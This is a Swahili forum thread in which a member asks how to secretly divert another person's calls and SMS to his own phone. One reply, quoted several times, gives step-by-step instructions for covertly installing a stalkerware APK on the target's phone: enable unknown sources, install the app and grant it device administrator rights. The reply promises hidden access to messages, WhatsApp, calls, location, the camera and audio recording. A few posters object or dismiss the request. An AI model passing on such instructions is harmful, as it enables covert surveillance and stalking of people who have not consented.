Naomba msaada juu ya kuhack simu

KAGAMEE

JF-Expert Member
Dec 20, 2013
3,881
4,511
Habari wakuu naomba mnisaidie namna ya kudivert call na sms kwenye simu ya mtu mwingne ili simu na sms zake ziwe zinaingia moja kwa moja kwangu kuna mtu amenambia nikipiga **21*no yangu kwenye cm husika# itasaidia lakini hamna kitu.Plz naomba anayejua anisaidie wakuu.
 
Habar wakuu. Naomba mnisaidie namna ya kudivert call na sms kwenye simu ya mtu mwingne ili simu na sms zake ziwe zinaingia moja kwa moja kwangu.Kuna mtu amenambia nikipiga **21*no yangu kwenye cm husika# itasaidia lkn hamna kitu.Plz naomba anayejua anisaidie wakuu.
Mkuu hizi systems zinazofanya haya mambo,anaye huziwa ni taasisi za serikali.akuna software free inayoweza fanya haya majambo ushauri,just chill and be happy life is too short 😍😎
 
Kwani wewe ndo miongoni mwa wale msiojulikana?? Kiongozi gani unataka umdukue mkuu??

Sent using Jamii Forums mobile app
 
Mkuu hizi systems zinazofanya haya mambo,anaye huziwa ni taasisi za serikali.akuna software free inayoweza fanya haya majambo ushauri,just chill and be happy life is too short 😍😎

NASHUKURU MKUU
 
Habar wakuu. Naomba mnisaidie namna ya kudivert call na sms kwenye simu ya mtu mwingne ili simu na sms zake ziwe zinaingia moja kwa moja kwangu.Kuna mtu amenambia nikipiga **21*no yangu kwenye cm husika# itasaidia lkn hamna kitu.Plz naomba anayejua anisaidie wakuu.
Kama anatumia smartphone, chukua simu yake kisha install app hii hapo chini..
(hakikisha ume allow installation from another sources)..

Utaweza kuona Sms, Kusikiliza calls, kuona mesej za whatsapp, kuona picha mpya anazopiga au kutumiwa, kuona namba mpya za simu anazosave, kuona location aliyopo, ku live view(yani unamuona alipo kwa camera aidha ya mbele au ya nyuma) bila yeye kujua, kurekodi audio alipo ukasikia maongezi yake bila yeye kujua, ku screenshot simu yake bila yeye kujua..

CHA MUHIMU HAKIKISHA WAKATI UNA INSTALL HIYO APP UI TURN KUWA DEVICE ADMINSTRATOR..View attachment app-v138.apk

Download Mobile Tracker Free | Mobile Tracker Free
.
.
Msafwa..
 
Kama anatumia smartphone, chukua simu yake kisha install app hii hapo chini..
(hakikisha ume allow installation from another sources)..

Utaweza kuona Sms, Kusikiliza calls, kuona mesej za whatsapp, kuona picha mpya anazopiga au kutumiwa, kuona namba mpya za simu anazosave, kuona location aliyopo, ku live view(yani unamuona alipo kwa camera aidha ya mbele au ya nyuma) bila yeye kujua, kurekodi audio alipo ukasikia maongezi yake bila yeye kujua, ku screenshot simu yake bila yeye kujua..

CHA MUHIMU HAKIKISHA WAKATI UNA INSTALL HIYO APP UI TURN KUWA DEVICE ADMINSTRATOR..View attachment 992420

Kuna haja ya kufanya hard reset ya simu zetu kila mara.
Huu upuuzi gani sasa!!!
 
Kama anatumia smartphone, chukua simu yake kisha install app hii hapo chini..
(hakikisha ume allow installation from another sources)..

Utaweza kuona Sms, Kusikiliza calls, kuona mesej za whatsapp, kuona picha mpya anazopiga au kutumiwa, kuona namba mpya za simu anazosave, kuona location aliyopo, ku live view(yani unamuona alipo kwa camera aidha ya mbele au ya nyuma) bila yeye kujua, kurekodi audio alipo ukasikia maongezi yake bila yeye kujua, ku screenshot simu yake bila yeye kujua..

CHA MUHIMU HAKIKISHA WAKATI UNA INSTALL HIYO APP UI TURN KUWA DEVICE ADMINSTRATOR..View attachment 992420

Download Mobile Tracker Free | Mobile Tracker Free
.
.
Msafwa..
NGOJA NTAJARIBU
 
Mkuu mbona imefeli kwangu,haileti taarifa kama ulivosema

Umemshauri Pia Kuhus Kukaza Roho?
Anajitafutia Mabalaa tuuh
Atumie Hio App Inafanya kaz
 
Back
Top Bottom